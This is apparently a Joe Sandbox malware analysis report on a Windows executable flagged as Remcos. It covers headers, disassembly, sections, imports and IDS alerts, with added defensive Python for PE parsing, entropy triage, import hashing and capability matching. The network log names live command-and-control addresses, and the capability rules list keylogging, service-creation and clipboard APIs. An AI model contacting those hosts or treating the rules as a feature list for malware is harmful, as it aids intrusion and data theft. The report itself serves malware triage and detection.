                                            TLSH:A416E164B38782F5CA93207498D5ABAD659963F44F3746C3B3952D2F1B793C10A3B388
                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............j...j...j...b...j...f...j...f..8j...b...j..MI...j...b...j...b...j..mI...j...j...h...}...j...}..^j...f...j..{a...j...f...j.
                                            Icon Hash:1f3371716373338f
                                            Entrypoint:0x4bda53
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:
                                            Time Stamp:0x4B2A6D78 [Thu Dec 17 17:42:16 2009 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:9d6d3b6b8f33f014f5a7c8d694c9773f
                                            Instruction
                                            push 00000060h
                                            push 0050EEA0h
                                            call 00007F1998FBE17Eh
                                            mov edi, 00000094h
                                            mov eax, edi
                                            call 00007F1998FBD51Ah
                                            mov dword ptr [ebp-18h], esp
                                            mov esi, esp
                                            mov dword ptr [esi], edi
                                            push esi
                                            call dword ptr [004E136Ch]
                                            mov ecx, dword ptr [esi+10h]
                                            mov dword ptr [006E55E0h], ecx
                                            mov eax, dword ptr [esi+04h]
                                            mov dword ptr [006E55ECh], eax
                                            mov edx, dword ptr [esi+08h]
                                            mov dword ptr [006E55F0h], edx
                                            mov esi, dword ptr [esi+0Ch]
                                            and esi, 00007FFFh
                                            mov dword ptr [006E55E4h], esi
                                            cmp ecx, 02h
                                            call 00007F1998F5E910h
                                            add byte ptr [eax], 00000000h
                                            mov dword ptr [006E55E4h], esi
                                            shl eax, 08h
                                            add eax, edx
                                            mov dword ptr [006E55E8h], eax
                                            xor esi, esi
                                            push esi
                                            mov edi, dword ptr [004E1388h]
                                            call edi
                                            cmp word ptr [eax], 5A4Dh
                                            jne 00007F1998FBE931h
                                            mov ecx, dword ptr [eax+3Ch]
                                            add ecx, eax
                                            cmp dword ptr [ecx], 00004550h
                                            jne 00007F1998FBE924h
                                            movzx eax, word ptr [ecx+18h]
                                            cmp eax, 0000010Bh
                                            je 00007F1998FBE931h
                                            cmp eax, 0000020Bh
                                            je 00007F1998FBE917h
                                            mov dword ptr [ebp-1Ch], esi
                                            jmp 00007F1998FBE939h
                                            cmp dword ptr [ecx+00000084h], 0Eh
                                            jbe 00007F1998FBE904h
                                            xor eax, eax
                                            cmp dword ptr [ecx+000000F8h], esi
                                            jmp 00007F1998FBE920h
                                            cmp dword ptr [ecx+74h], 0Eh
                                            jbe 00007F1998FBE8F4h
                                            xor eax, eax
                                            cmp dword ptr [ecx+000000E8h], esi
                                            setne al
                                            mov dword ptr [ebp-1Ch], eax
                                            Programming Language:
                                            • [ASM] VS2003 (.NET) build 3077
                                            • [ C ] VS2003 (.NET) build 3077
                                            • [ C ] VS2003 (.NET) SP1 build 6030
                                            • [C++] VS2003 (.NET) SP1 build 6030
                                            • [C++] VS2003 (.NET) build 3077
                                            • [RES] VS2003 (.NET) build 3077
                                            • [LNK] VS2003 (.NET) build 3077
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12813c | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e7000 | 0x116c18 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x111290 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xdf044 | 0xe0000 | 3190b08eda668a97a7c1703364eeb9f9 | False | 0.49050467354910715 | data | 6.632563800200495 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xe1000 | 0x49870 | 0x4a000 | 1da98542fc0d8b5b2b6e7680e262c44b | False | 0.29902937605574326 | data | 5.497521367739488 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x12b000 | 0x1bbe94 | 0x1a4000 | b1b83c4f64d47d06ab7b984326ffaa1a | False | 0.9792858305431548 | data | 7.9838719215032015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e7000 | 0x116c18 | 0x117000 | 0cee996523a166b5f9cb7c14ed898703 | False | 0.5741644965277778 | data | 7.249997532227287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
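The entry stub listed above is the VS2003 C runtime's start-up code, which matches the compiler list that follows it. The first indirect call fills a 0x94-byte OSVERSIONINFOA (GetVersionExA) and stores platform, major, minor and build number; the second (`xor esi, esi` / `push esi` / `call edi`) obtains the image's own base (GetModuleHandleA with a NULL argument); the stub then checks the MZ signature, follows e_lfanew to the PE signature, switches on the optional header magic (0x10B PE32, 0x20B PE32+), requires NumberOfRvaAndSizes above 14 and tests the COM descriptor directory to decide whether the image is managed. The same header walk produces the data directory and section tables above, where .data stands out: 1.7 MB of readable and writable data with entropy 7.98 and ZLIB complexity 0.98, which is what a packed or encrypted payload looks like. The Python below is added here as an example and is not part of the Joe Sandbox report: it performs that walk with the standard library only, computes per-section MD5 and entropy, and flags packed-looking and writable-executable sections. The image it parses is constructed in memory (valid headers, not loadable); the 7.0 entropy threshold is an assumption.

```python
import hashlib
import math
import struct

IMAGE_DOS_SIGNATURE, IMAGE_NT_SIGNATURE = 0x5A4D, 0x00004550   # "MZ", "PE\0\0"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000

def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0..8, the 'Entropy' column of the section table."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_pe(buf: bytes) -> dict:
    """Walk the headers the way the entry stub does, then read directories and sections."""
    if struct.unpack_from("<H", buf, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")                      # cmp word ptr [eax], 5A4Dh
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]                 # mov ecx, [eax+3Ch]
    if struct.unpack_from("<I", buf, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")                      # cmp dword ptr [ecx], 4550h
    fh = e_lfanew + 4
    machine, nsec, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, fh)
    oh = fh + 20
    magic = struct.unpack_from("<H", buf, oh)[0]                      # movzx eax, [ecx+18h]
    if magic == PE32_MAGIC:
        nr_off, dd_off = oh + 92, oh + 96                             # [ecx+74h], [ecx+E8h]
    elif magic == PE32PLUS_MAGIC:
        nr_off, dd_off = oh + 108, oh + 112                           # [ecx+84h], [ecx+F8h]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_rva = struct.unpack_from("<I", buf, nr_off)[0]
    dirs = [struct.unpack_from("<II", buf, dd_off + 8 * i) for i in range(n_rva)]
    is_managed = n_rva > 14 and dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR][0] != 0  # the stub's test
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", buf, oh + opt_size + 40 * i)
        raw = buf[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": rawsize,
                         "md5": hashlib.md5(raw).hexdigest(), "entropy": shannon_entropy(raw),
                         "x": bool(flags & IMAGE_SCN_MEM_EXECUTE),
                         "w": bool(flags & IMAGE_SCN_MEM_WRITE)})
    return {"machine": machine, "timestamp": tstamp, "characteristics": chars, "magic": magic,
            "is_managed": is_managed, "directories": dirs, "sections": sections}

def triage_sections(sections, entropy_threshold=7.0) -> list:
    """Heuristic findings: high-entropy (packed or encrypted) and writable+executable sections."""
    findings = []
    for s in sections:
        if s["entropy"] >= entropy_threshold:
            findings.append((s["name"], "entropy %.2f: packed or encrypted content" % s["entropy"]))
        if s["x"] and s["w"]:
            findings.append((s["name"], "writable and executable"))
    return findings

def _align(n: int, a: int) -> int: return (n + a - 1) // a * a

def build_sample_pe32(sections) -> bytes:
    """Constructed test input: a minimal PE32 image with valid headers (not loadable)."""
    file_align, sect_align, opt_size = 0x200, 0x1000, 224
    hdr_len = _align(0x40 + 4 + 20 + opt_size + 40 * len(sections), file_align)
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)                            # e_lfanew
    # 0x010F = RELOCS_STRIPPED | EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | 32BIT_MACHINE
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x4B2A6D78, 0, 0, opt_size, 0x010F)
    sec_hdrs, raw, rawptr, va = b"", b"", hdr_len, sect_align
    for name, data, flags in sections:
        rawsize = _align(len(data), file_align)
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                                rawsize, rawptr, 0, 0, 0, 0, flags)
        raw += data.ljust(rawsize, b"\0")
        rawptr, va = rawptr + rawsize, _align(va + len(data), sect_align)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "H" * 2 + "I" * 6,
                      PE32_MAGIC, 7, 10,
                      0, 0, 0, sect_align, sect_align, 0, 0x400000, sect_align, file_align,
                      4, 0, 0, 0, 4, 0, 0, va, hdr_len, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * (16 * 8)                                            # 16 empty data directories
    img = bytes(dos) + b"PE\0\0" + file_hdr + opt + sec_hdrs
    return img.ljust(hdr_len, b"\0") + raw

# Constructed sample: low-entropy code next to a high-entropy read/write data
# section, the pattern the report shows for .data (entropy 7.98, READ | WRITE).
SAMPLE_PE = build_sample_pe32([
    (b".text", b"\x55\x8b\xec\x83\xec\x10\x33\xc0\x5d\xc3" * 400, 0x60000020),  # CODE | EXECUTE | READ
    (b".data", b"".join(hashlib.sha256(bytes([i])).digest() for i in range(256)), 0xC0000040),  # IDATA | READ | WRITE
])

if __name__ == "__main__":
    info = parse_pe(SAMPLE_PE)
    for name, why in triage_sections(info["sections"]):
        print("FINDING:", name, why)
```

Pointed at the real file instead of SAMPLE_PE (`parse_pe(open(path, "rb").read())`), the section names, virtual addresses, raw sizes, MD5s and entropies come out in the same form as the table above, and the .data row is the one the triage flags.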
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2e74a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5236486486486487
RT_ICON | 0x2e75d0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.48118279569892475
RT_ICON | 0x2e78b8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3951219512195122
RT_ICON | 0x2e7f20 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.43713872832369943
RT_ICON | 0x2e8488 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6398916967509025
RT_ICON | 0x2e8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5298507462686567
RT_ICON | 0x2e9bd8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5682624113475178
RT_ICON | 0x2ea040 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4872950819672131
RT_ICON | 0x2ea9c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.39704502814258913
RT_ICON | 0x2eba70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.34813278008298754
RT_ICON | 0x2ee018 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.2675366084081247
RT_ICON | 0x2f2240 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.2926524953789279
RT_ICON | 0x2f76c8 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.2580933361362203
RT_GROUP_ICON | 0x300b70 | 0xbc | data | English | United States | 0.6329787234042553
RT_DLGINCLUDE | 0x300c2c | 0x78436 | PC bitmap, Windows 3.x format, 62172 x 2 x 36, image size 492645, cbSize 492598, bits offset 54 | | | 0.761982387261012
RT_ANIICON | 0x379064 | 0xcd26 | PC bitmap, Windows 3.x format, 7428 x 2 x 48, image size 52883, cbSize 52518, bits offset 54 | | | 0.4269964583571347
RT_ANIICON | 0x385d8c | 0x8fb3 | PC bitmap, Windows 3.x format, 4840 x 2 x 53, image size 37717, cbSize 36787, bits offset 54 | | | 0.3975045532389159
RT_ANIICON | 0x38ed40 | 0xa9c1 | PC bitmap, Windows 3.x format, 6224 x 2 x 46, image size 44274, cbSize 43457, bits offset 54 | | | 0.3912143037945555
RT_ANIICON | 0x399704 | 0x349ad | PC bitmap, Windows 3.x format, 27386 x 2 x 44, image size 216267, cbSize 215469, bits offset 54 | | | 0.4752609424093489
RT_ANIICON | 0x3ce0b4 | 0x2fb63 | PC bitmap, Windows 3.x format, 25264 x 2 x 45, image size 196298, cbSize 195427, bits offset 54 | | | 0.4726317243779007
DLL | Imports
KERNEL32.DLL: MoveFileA, GetFullPathNameA, GetCurrentDirectoryA, GetDriveTypeA, CreateDirectoryA, SetStdHandle, DeleteFileA, SetFilePointer, FlushFileBuffers, HeapReAlloc, GetSystemTimeAsFileTime, GetDateFormatA, GetTimeFormatA, GetStartupInfoA, HeapAlloc, HeapFree, RtlUnwind, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, SetHandleCount, InterlockedExchange, VirtualQuery, LCMapStringA, LCMapStringW, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, RaiseException, IsBadReadPtr, OutputDebugStringA, GetStdHandle, ExpandEnvironmentStringsA, WriteFile, ReadFile, GetTempFileNameA, TlsAlloc, TlsSetValue, TlsFree, TlsGetValue, GetSystemInfo, GetTempPathA, ExitProcess, FindFirstFileA, FindClose, CreateFileA, GetWindowsDirectoryA, SetCurrentDirectoryA, CopyFileA, GetFileAttributesA, GetFileType, CloseHandle, TerminateProcess, GetModuleFileNameA, SetEnvironmentVariableA, IsValidCodePage, GetCPInfo, Sleep, GetCurrentProcessId, GetEnvironmentVariableA, GetThreadLocale, GetLocaleInfoA, IsValidLocale, GetUserDefaultLCID, GetACP, HeapSize, GlobalFree, GlobalAlloc, GlobalUnlock, GlobalLock, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLocaleInfoW, DeleteCriticalSection, GetCommandLineA, SetErrorMode, GetVersionExA, FreeLibrary, LoadLibraryA, GetCurrentThreadId, SetLastError, RemoveDirectoryA, MoveFileExA, GetModuleHandleA, GetProcAddress, GetCurrentProcess, WideCharToMultiByte, SystemTimeToFileTime, FileTimeToLocalFileTime, lstrcmpA, lstrcpyW, LocalAlloc, FileTimeToSystemTime, GetTickCount, GetSystemDirectoryA, MultiByteToWideChar, GetLastError, FormatMessageA, LocalFree, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetUnhandledExceptionFilter, GetTimeZoneInformation, VirtualProtect, EnumSystemLocalesA, GetStringTypeA, GetStringTypeW, SetEndOfFile, IsBadCodePtr, GetOEMCP, CompareStringA, CompareStringW, QueryPerformanceCounter
ADVAPI32.dll: DeleteService, RegCreateKeyA, FreeSid, CheckTokenMembership, AllocateAndInitializeSid, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, CreateServiceA, RegCloseKey, RegDeleteKeyA, OpenSCManagerA, OpenServiceA, CloseServiceHandle, QueryServiceStatus, RegOpenKeyExA, ControlService, StartServiceA, RegQueryValueExA, RegSetValueExA
COMCTL32.dll: ImageList_Add, ImageList_BeginDrag, ImageList_Create, ImageList_ReplaceIcon, ImageList_SetDragCursorImage, ImageList_DragLeave, ImageList_DragEnter, ImageList_DragMove, ImageList_EndDrag, ImageList_Destroy, ImageList_GetImageCount, ImageList_Draw, ImageList_GetIconSize
comdlg32.dll: PageSetupDlgA, PrintDlgA, ChooseFontA, ChooseColorA, GetSaveFileNameA, CommDlgExtendedError, GetOpenFileNameA
CRYPT32.dll: CertGetNameStringA, CryptDecodeObject, CryptMsgClose, CertCloseStore, CertVerifyTimeValidity, CertFindCertificateInStore, CryptMsgGetParam, CryptQueryObject, CertFreeCertificateContext
GDI32.dll: GetNearestPaletteIndex, CreatePalette, SetStretchBltMode, GetClipBox, ExtSelectClipRgn, ExtFloodFill, GetPixel, SetPixel, Polyline, PolyBezier, TextOutA, SetROP2, GetCharABCWidthsA, GetTextExtentExPointA, SetWindowOrgEx, SetViewportOrgEx, SetWindowExtEx, SetViewportExtEx, SetMapMode, GetBkColor, GetTextColor, Arc, CreatePatternBrush, Polygon, SetPolyFillMode, PolyPolygon, Rectangle, RoundRect, Ellipse, SetBrushOrgEx, MaskBlt, StretchBlt, StretchDIBits, RestoreDC, SaveDC, GetRgnBox, EqualRgn, PtInRegion, PatBlt, CreateICA, CreateDIBSection, GetDIBits, CreateDIBitmap, GetDIBColorTable, EnumFontFamiliesExA, GetEnhMetaFileA, CopyEnhMetaFileA, DeleteEnhMetaFile, SetAbortProc, StartDocA, EndDoc, StartPage, EndPage, CreateDCA, GetSystemPaletteEntries, CreateHatchBrush, MoveToEx, LineTo, ExtCreatePen, GetStockObject, CreateBitmap, CreateCompatibleBitmap, BitBlt, DeleteDC, CreateCompatibleDC, GetPaletteEntries, SetTextAlign, RectInRegion, CreateRectRgnIndirect, CombineRgn, SelectClipRgn, GetObjectA, CreateSolidBrush, CreatePen, SetBkMode, SetTextColor, SetBkColor, GetRegionData, ExtCreateRegion, OffsetRgn, ExcludeClipRect, CreateRectRgn, GetTextExtentPoint32A, SelectPalette, RealizePalette, GdiFlush, SelectObject, GetTextMetricsA, GetDeviceCaps, DeleteObject, Pie, CreateFontIndirectA
ole32.dll: OleUninitialize, OleInitialize, RegisterDragDrop, CoLockObjectExternal, RevokeDragDrop, OleSetClipboard, OleIsCurrentClipboard, OleFlushClipboard, ReleaseStgMedium, OleGetClipboard, CoCreateInstance
OLEAUT32.dll: SysAllocString, SysFreeString, SysStringLen
SHELL32.dll: SHGetPathFromIDListA, SHGetMalloc, ShellExecuteExA, ExtractIconExA, ExtractIconA, DragQueryFileA, DragFinish, DragQueryPoint, DragAcceptFiles, SHGetSpecialFolderLocation
USER32.dll: PostThreadMessageA, MessageBeep, SetTimer, KillTimer, ShowCursor, EnumDisplaySettingsA, ChangeDisplaySettingsA, SetClipboardData, RegisterClipboardFormatA, DrawStateA, DrawEdge, GetMenuStringA, DefMDIChildProcA, TranslateMDISysAccel, DefFrameProcA, GetMessagePos, MapWindowPoints, ChildWindowFromPoint, InsertMenuItemA, GetSubMenu, CreateMenu, AppendMenuA, InsertMenuA, RemoveMenu, CreatePopupMenu, SetMenuItemInfoA, UnionRect, GetWindowDC, ModifyMenuA, CheckMenuRadioItem, CheckMenuItem, GetMenuState, TranslateAcceleratorA, CreateAcceleratorTableA, DestroyAcceleratorTable, ValidateRect, GetMessageA, DrawIconEx, DrawFrameControl, GetWindowTextA, GetClassNameA, DestroyCursor, CreateIconIndirect, LoadImageA, DestroyIcon, GetIconInfo, LoadBitmapA, LoadIconA, LoadCursorA, MessageBoxA, DdeFreeStringHandle, BeginPaint, DrawIcon, EndPaint, SetMenu, PostMessageA, HideCaret, OpenClipboard, IsClipboardFormatAvailable, CloseClipboard, keybd_event, SetForegroundWindow, GetForegroundWindow, OffsetRect, DrawFocusRect, CopyRect, DrawTextA, CreateDialogIndirectParamA, RegisterClassA, UnregisterClassA, FlashWindow, SetWindowRgn, AdjustWindowRectEx, GetSystemMenu, EnableMenuItem, DrawMenuBar, GetDesktopWindow, IsIconic, GetDC, ReleaseDC, SendMessageA, PostQuitMessage, TranslateMessage, DispatchMessageA, PeekMessageA, DestroyMenu, IsZoomed, BringWindowToTop, GetDlgItem, CreateDialogParamA, InflateRect, GetUpdateRgn, GetSysColor, CreateWindowExA, SetWindowsHookExA, IsDialogMessageA, TrackPopupMenu, IsWindow, PtInRect, SetCursor, GetCapture, DestroyWindow, UnhookWindowsHookEx, UnregisterHotKey, RegisterHotKey, CallNextHookEx, GetActiveWindow, GetMenuItemCount, GetMenuItemInfoA, SystemParametersInfoA, GetMessageTime, GetWindow, DdeQueryStringA, DdeUninitialize, DdeFreeDataHandle, DdeGetData, DdeCreateDataHandle, DdeGetLastError, DdeInitializeA, DdeDisconnect, DdeClientTransaction, GetUpdateRect, DdeCreateStringHandleA, GetAsyncKeyState, GetSystemMetrics, GetKeyState, GetWindowRect, GetClientRect, FillRect, GetWindowLongA, SetWindowLongA, SetWindowPos, SetFocus, EnableWindow, ShowWindow, DdePostAdvise, DdeConnect, GetWindowTextLengthA, DdeNameService, SetCapture, ReleaseCapture, BeginDeferWindowPos, EndDeferWindowPos, InvalidateRect, SetWindowTextA, GetFocus, IsWindowEnabled, IsWindowVisible, CallWindowProcA, DefWindowProcA, DeferWindowPos, MoveWindow, ClientToScreen, ScreenToClient, UpdateWindow, RedrawWindow, SetParent, GetCursorPos, WindowFromPoint, GetParent, ScrollWindow, SetScrollInfo, GetScrollInfo, SetCursorPos
WINTRUST.dll: WinVerifyTrust
WSOCK32.dll: closesocket, inet_addr, ntohs, WSAGetLastError, recvfrom, sendto, htons, bind, ioctlsocket, setsockopt, inet_ntoa, socket, WSAStartup
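The import table is the static counterpart of several signatures in the report: SetWindowsHookExA together with GetAsyncKeyState and GetKeyState (global keyboard hook), OpenClipboard and SetClipboardData, SystemParametersInfoA and ChangeDisplaySettingsA (wallpaper and display changes), OpenSCManagerA, CreateServiceA and StartServiceA (service control), AdjustTokenPrivileges and OpenProcessToken, ShellExecuteExA, and the WSOCK32 socket set. An import hash of the kind shown in the header (9d6d3b6b8f33f014f5a7c8d694c9773f) is, in pefile's definition, the MD5 over exactly these dll.function pairs in import-table order: it survives a rebuild of the same source with the same imports and changes as soon as one function is added, removed or reordered. The Python below is an added example, not part of the report: it parses rows in the report's own "DLL<imports>" shape, computes the import hash as pefile defines it, and maps the imported APIs to behaviours. The rows embedded in it are a constructed subset of the table above (the long KERNEL32 and USER32 rows are shortened), so the hash it prints is not the report's value; the capability groupings and the half-of-the-rule threshold are the editor's own assumptions.

```python
import hashlib
import re

# Import rows in the report's "DLL<imports>" shape, copied from the table above.
# Constructed subset: KERNEL32 and USER32 are cut down to the entries the rules
# need, so imphash(parse_import_rows(REPORTED_IMPORTS)) is NOT the report's
# Import Hash; that value needs the binary's full import table in its own order.
REPORTED_IMPORTS = """\
KERNEL32.DLLMoveFileA, DeleteFileA, CopyFileA, MoveFileExA, LoadLibraryA, GetProcAddress, GetTempPathA
ADVAPI32.dllDeleteService, RegCreateKeyA, CheckTokenMembership, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, CreateServiceA, OpenSCManagerA, OpenServiceA, ControlService, StartServiceA, RegSetValueExA
CRYPT32.dllCertGetNameStringA, CryptQueryObject, CertFindCertificateInStore
SHELL32.dllShellExecuteExA, SHGetSpecialFolderLocation
USER32.dllChangeDisplaySettingsA, SetClipboardData, OpenClipboard, CloseClipboard, keybd_event, SetWindowsHookExA, UnhookWindowsHookEx, RegisterHotKey, CallNextHookEx, SystemParametersInfoA, GetAsyncKeyState, GetKeyState, SetCursorPos
WINTRUST.dllWinVerifyTrust
WSOCK32.dllclosesocket, inet_addr, recvfrom, sendto, bind, socket, WSAStartup
"""

# The DLL name is glued to the first function in the report; split on the extension.
ROW_RE = re.compile(r"^(?P<dll>[\w.]+?\.(?:dll|ocx|sys))(?P<funcs>.+)$", re.IGNORECASE)

def parse_import_rows(text: str) -> list:
    """Return [(dll, [function, ...]), ...] in the order the rows appear."""
    table = []
    for row in text.splitlines():
        m = ROW_RE.match(row.strip())
        if m:
            funcs = [f.strip() for f in m.group("funcs").split(",") if f.strip()]
            table.append((m.group("dll"), funcs))
    return table

def imphash(table) -> str:
    """Import hash as pefile computes it: 'library.function' for every import in
    table order, library lowercased with .dll/.ocx/.sys removed, function name
    lowercased (imports by ordinal appear as 'ordN'), comma-joined, MD5."""
    parts = []
    for dll, funcs in table:
        lib = dll.lower()
        if lib.endswith((".dll", ".ocx", ".sys")):
            lib = lib[:-4]
        parts.extend("%s.%s" % (lib, f.lower()) for f in funcs)
    return hashlib.md5(",".join(parts).encode()).hexdigest()

# Behaviour rules keyed by API name with the A/W suffix removed. Assumption:
# these groupings are the editor's, chosen to line up with the report's
# signatures (keyboard hook, clipboard, wallpaper, services, shell).
CAPABILITIES = {
    "global keyboard hook / keylogging": {"SetWindowsHookEx", "CallNextHookEx", "GetAsyncKeyState", "GetKeyState"},
    "clipboard access": {"OpenClipboard", "SetClipboardData", "OleGetClipboard"},
    "synthetic keyboard / mouse input": {"keybd_event", "SetCursorPos"},
    "service creation / control": {"OpenSCManager", "CreateService", "StartService", "ControlService", "DeleteService"},
    "registry write": {"RegCreateKey", "RegSetValueEx"},
    "token privilege adjustment": {"OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValue"},
    "display / wallpaper change": {"SystemParametersInfo", "ChangeDisplaySettings"},
    "shell execution": {"ShellExecuteEx"},
    "raw socket networking": {"socket", "bind", "sendto", "recvfrom", "WSAStartup"},
    "code-signature inspection": {"WinVerifyTrust", "CryptQueryObject", "CertFindCertificateInStore"},
    "file move / delete (self-removal candidates)": {"MoveFileEx", "DeleteFile", "CopyFile"},
    "dynamic API resolution": {"LoadLibrary", "GetProcAddress"},
}

def strip_charset_suffix(name: str) -> str:
    """'CreateServiceA' -> 'CreateService'; strips a trailing A/W only after a lowercase letter or digit."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", name)

def match_capabilities(table) -> dict:
    """Map capability -> sorted matched APIs, requiring at least half of a rule's APIs to be imported."""
    present = {strip_charset_suffix(f) for _, funcs in table for f in funcs}
    hits = {}
    for cap, apis in CAPABILITIES.items():
        matched = sorted(apis & present)
        if matched and len(matched) * 2 >= len(apis):
            hits[cap] = matched
    return hits

if __name__ == "__main__":
    table = parse_import_rows(REPORTED_IMPORTS)
    print("imphash of this subset:", imphash(table))
    for cap, apis in match_capabilities(table).items():
        print("%-45s %s" % (cap, ", ".join(apis)))
```

Feeding the full rows from the table above (or, better, the import table read from the file itself) gives the same capability list; the hash only agrees with the report when the input is the binary's complete import table in its original order.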
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-09T22:42:09.541641+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.5 | 49704 | 181.131.217.244 | 30201 | TCP
2024-12-09T22:42:10.906189+0100 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 181.131.217.244 | 30201 | 192.168.2.5 | 49704 | TCP
2024-12-09T22:42:12.762647+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49707 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 22:42:09.420866966 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:09.540417910 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
Dec 9, 2024 22:42:09.540543079 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:09.541640997 CET | 49704 | 30201 | 192.168.2.5 | 181.131.217.244
Dec 9, 2024 22:42:09.660990000 CET | 30201 | 49704 | 181.131.217.244 | 192.168.2.5
